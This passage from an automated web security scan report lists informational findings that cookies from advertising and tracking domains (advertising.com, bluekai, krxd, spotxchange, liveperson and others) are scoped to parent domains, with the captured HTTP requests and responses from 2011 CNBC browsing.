GET /site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:21:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:21:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7
...[SNIP]...

12.57. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:15:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 559
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7
...[SNIP]...

12.58. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:31:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:31:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=8
...[SNIP]...

12.59. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:57:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:57:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=9
...[SNIP]...

12.60. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgtix=BgABADMBSQABADMBHAAEADUBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:55:10 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

12.61. http://search.spotxchange.com/track/tag/6382.1008/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /track/tag/6382.1008/img

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/tag/6382.1008/img HTTP/1.1
Host: search.spotxchange.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/17353/universal.html?page_name=netsuite_homepage&NetSuite_Homepage=1&mpuid=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUxMDMyNjMK; partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:37:47 GMT
Server: Apache
P3P: CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa"
Set-Cookie: history-0=eNrVkttygjAQhq%2Ftu7STEMXSOygBwxQyxcghdxi0BhCY6UHJ0zdKDw%2FQ2pleJrv%2Fv%2F9%2Bs8z2byCE08mdY06vlzgm9gPh2L3LWado%2B6JohRWVARB7ryqM5pVDC2wypyHVqRaapI13fCBzobpj6HayyCJVpsmW%2Bx7gSzIvmP5XGFAmUKjIjKLQjFgny733XKYrSQ1sRlU%2F6lUn8zQ2eBYA7dOIxur5%2FdkbUEmMyBVonIsNnanOs3iXIWdYI95zPxkyo6nHum0S%2BZ1JLII3joLdOvnyg1qvhK93Gd8nP5Cn5bZIH3Wm2gwZPkbuedb0syb2ScXTWbVJrGazcHrR1h%2B95HDeS%2Bcvfa%2FNUKJOu2tfNWqFpAhaEzbSnl2etlsPkbsC%2F4o2uwRtAG4vTRvqu1aRm6Of0A7V0%2FB3tO0D%2FeXbvnoHx%2BZvDQ%3D%3D; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
Set-Cookie: partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
Set-Cookie: user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUzMjM0NjcK; expires=Thu, 06-Sep-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 15:37:47 GMT
Cache-Control: no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://cdn.spotxchange.com/media/thumbs/pixel/pixel.gif
Content-Type: text/html
Content-Length: 0
12.62. http://server.iad.liveperson.net/hc/52793056/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/52793056/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/52793056/?&site=52793056&cmd=mTagKnockPage&lpCallId=802803296362-872958060353&protV=20&lpjson=1&id=5840223757&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315323151587; expires=Wed, 07-Sep-2011 15:32:31 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 15:32:31 GMT
Set-Cookie: HumanClickSiteContainerID_52793056=STANDALONE; path=/hc/52793056
Set-Cookie: LivePersonID=-5110247826455-1315323140:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 15:32:31 GMT; path=/hc/52793056; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1484

lpConnLib.Process({"ResultSet": {"lpCallId":"802803296362-872958060353","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

12.63. http://services.krxd.net/geoip

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.krxd.net
Path:   /geoip

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /geoip?root_name=KRUX.ST.geo HTTP/1.1
Host: services.krxd.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=28800
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:00:27 GMT
Etag: "833b91a59b2962c75db21f499c2e9829d1408b57"
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Krux Cache
Set-Cookie: ServedBy=logger-b003; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:20:27 GMT
Via: 1.1 logger-b003.krxd.net
X-Age: 1
X-Cache: HIT
X-Cache-Hits: 1
X-GeoIP: 50.23.123.106
X-Request-Backend: geoip
X-Request-Time: D=543 t=1315321227510505
X-Served-By: logger-b003.krxd.net
X-Served-By: logger-b003.krxd.net
Content-Length: 75
Connection: keep-alive

KRUX.ST.geo={"country": "US", "region": "TX", "city": "Dallas", "dma": 623}

12.64. http://services.krxd.net/pixel.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.krxd.net
Path:   /pixel.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel.gif?_kcp_d=cnbc.com&_kpref_=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh&_kuid=HK4OZLzp&_kpa_site=cnbc&_kpa_sect=home&_kpa_sub=homeus&_kpa_pageid=15839285&_kpa__c=homeus&_kpa_tandomad=none&_kpa_pm=1&kplt0=146&fired=beforeunload&_knifr=4&_kpid=d719e39d-e4be-4896-8d71-71012d0c51a0&_kcp_s=cnbc.com&_kcp_sc=home&_kcp_ssc=homeus HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private, no-cache, no-store
Content-Type: image/gif
Date: Tue, 06 Sep 2011 14:57:00 GMT
Last-Modified: Thu, 25 Aug 2011 01:26:31 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: ServedBy=logger-b011; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:00 GMT
X-Request-Time: D=258 t=1315321020652677
X-Served-By: logger-b011.krxd.net
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,........@..D.;

12.65. http://tags.bluekai.com/site/3834

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3834

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3834 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: bk=gmD52hDC+h5Mq/0A; bkc=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; bko=KJhf0X49XB1pNRIHyjQ4hMGZ0LexgykilKOQRcY+ixS0JgWh1shPX4PMj8M/eVWh1jpZRZeGOq/RsKETRS0pleeVnhW/iT7Cei21nOc/rLReWo1atF+YpzSwZDWu0ZJA99YljOt7; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAg6FxNWRh7dUE4UeP6LMyzYAxSDkOAv6m7uQ9bnSHkn2J6H1H9KhtuyZGNkihivHBm/wxmQPBGwGJLfg+MtPa7zT8IxXfd1Ipl7KIpA12agz3LNenQTsqLdj/50Bt/CcqEbmhMHueWJL0YnSj33fMlWyvjMOw+ubcojN1yFmAmRcZJFxdaaPWlBqleiC7SZkh7pdovgiMSyOUxuZsNzB3u3Dab70LpaF3XHlTs/VTZVUeATMQCE1u9X10BkPxMbeUWjVCII8Sn9U+PItKYklnNc+Iu40IiLic/4u1SsLPrI8F+5dMcO1hZ1ht9HKMCK6rkK5SSkAS5RQeyAfd0LWrD8GJvDuhtVHP+6bYYNgjcFaHixpAbt17j7TtaP/EYcFCFyBE6kGPC0Mb+7mlm68pXFBpefkMFASUi4ajm1o73h3UxKwvSNf/m4V03pr6loVdH7oUwgrfvPfEukVc4tPjqlEn2H6MMT=; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpn+16wb9D9y+ejQPVux9SlyLv; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e66358a; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 07 Sep 2011 15:00:28 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=noTeVCDC+h5Mq/0A; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=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; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Wed, 07-Sep-2011 15:00:28 GMT; path=/; domain=.bluekai.com
BK-Server: bbc9
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

12.66. http://www.actonsoftware.com/acton/bn/1227/visitor.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actonsoftware.com
Path:   /acton/bn/1227/visitor.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wp1227

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /acton/bn/1227/visitor.gif?ts=1315341157226&ref=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio HTTP/1.1
Host: www.actonsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: wp1227=UVVADDDDDDTKKMZM; Domain=.actonsoftware.com; Expires=Wed, 05-Sep-2012 15:32:50 GMT; Path=/
